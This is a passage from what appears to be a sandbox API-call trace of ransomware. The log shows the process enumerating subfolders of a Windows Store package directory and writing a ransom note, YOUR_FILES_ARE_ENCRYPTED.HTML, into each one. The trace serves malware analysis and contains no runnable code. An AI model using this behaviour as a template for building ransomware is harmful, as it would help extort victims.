lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\*" [0120.680] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9357b12, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x93f064f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x9783e1e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x626778 [0120.681] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9357b12, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x93f064f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x9783e1e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0120.681] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x93f064f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x93f064f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x9416799, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0120.681] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.681] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC") returned 88 [0120.681] GetProcessHeap () returned 0x600000 [0120.681] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.682] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC" [0120.682] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\*" [0120.682] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x93f064f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x93f064f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x9416799, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f3e4, dwReserved1=0x62f338, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0120.694] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x93f064f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x93f064f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x9416799, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f3e4, dwReserved1=0x62f338, cFileName="..", cAlternateFileName="")) returned 1 [0120.694] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x93f064f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x93f064f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x93f064f, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f3e4, dwReserved1=0x62f338, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0120.694] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.694] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCache") returned 98 [0120.694] GetProcessHeap () returned 0x600000 [0120.694] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.695] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCache" [0120.695] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCache\\*" [0120.695] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x93f064f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x93f064f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x93f064f, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dafd8, dwReserved1=0x62f340, cFileName=".", cAlternateFileName="")) returned 0x626638 [0120.695] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x93f064f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x93f064f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x93f064f, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dafd8, dwReserved1=0x62f340, cFileName="..", cAlternateFileName="")) returned 1 [0120.695] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x93f064f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x93f064f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x93f064f, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dafd8, dwReserved1=0x62f340, cFileName="..", cAlternateFileName="")) returned 0 [0120.696] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0120.696] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 128 [0120.696] GetProcessHeap () returned 0x600000 [0120.696] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.696] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.697] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.698] CloseHandle (hObject=0x320) returned 1 [0120.698] GetProcessHeap () returned 0x600000 [0120.698] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.698] GetProcessHeap () returned 0x600000 [0120.698] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.698] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9416799, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x9416799, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x9416799, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f3e4, dwReserved1=0x62f338, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0120.698] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.698] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCookies") returned 100 [0120.698] GetProcessHeap () returned 0x600000 [0120.698] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.698] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCookies" [0120.698] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCookies\\*" [0120.698] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCookies\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9416799, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x9416799, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x9416799, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dafd8, dwReserved1=0x62f340, cFileName=".", cAlternateFileName="")) returned 0x626638 [0120.699] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9416799, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x9416799, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x9416799, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dafd8, dwReserved1=0x62f340, cFileName="..", cAlternateFileName="")) returned 1 [0120.699] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9416799, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x9416799, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x9416799, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dafd8, dwReserved1=0x62f340, cFileName="..", cAlternateFileName="")) returned 0 [0120.699] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0120.699] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 130 [0120.699] GetProcessHeap () returned 0x600000 [0120.699] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.699] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.700] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.701] CloseHandle (hObject=0x320) returned 1 [0120.701] GetProcessHeap () returned 0x600000 [0120.701] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.701] GetProcessHeap () returned 0x600000 [0120.701] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.701] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x93f064f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x93f064f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x93f064f, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f3e4, dwReserved1=0x62f338, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0120.701] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.701] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetHistory") returned 100 [0120.701] GetProcessHeap () returned 0x600000 [0120.701] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.701] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetHistory" [0120.701] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetHistory\\*" [0120.701] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x93f064f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x93f064f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x93f064f, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dafd8, dwReserved1=0x62f340, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0120.701] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x93f064f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x93f064f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x93f064f, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dafd8, dwReserved1=0x62f340, cFileName="..", cAlternateFileName="")) returned 1 [0120.701] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x93f064f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x93f064f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x93f064f, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dafd8, dwReserved1=0x62f340, cFileName="..", cAlternateFileName="")) returned 0 [0120.701] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0120.701] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 130 [0120.701] GetProcessHeap () returned 0x600000 [0120.701] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.702] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.702] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.703] CloseHandle (hObject=0x320) returned 1 [0120.703] GetProcessHeap () returned 0x600000 [0120.703] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.703] GetProcessHeap () returned 0x600000 [0120.703] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.703] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x93f064f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x93f064f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x93f064f, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f3e4, dwReserved1=0x62f338, cFileName="Temp", cAlternateFileName="")) returned 1 [0120.703] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.703] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Temp") returned 93 [0120.703] GetProcessHeap () returned 0x600000 [0120.703] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.703] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Temp" [0120.703] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Temp\\*" [0120.703] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x93f064f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x93f064f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x93f064f, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dafd8, dwReserved1=0x62f340, cFileName=".", cAlternateFileName="")) returned 0x626638 [0120.704] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x93f064f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x93f064f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x93f064f, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dafd8, dwReserved1=0x62f340, cFileName="..", cAlternateFileName="")) returned 1 [0120.704] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x93f064f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x93f064f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x93f064f, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dafd8, dwReserved1=0x62f340, cFileName="..", cAlternateFileName="")) returned 0 [0120.704] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0120.704] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0120.704] GetProcessHeap () returned 0x600000 [0120.704] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.704] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.705] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 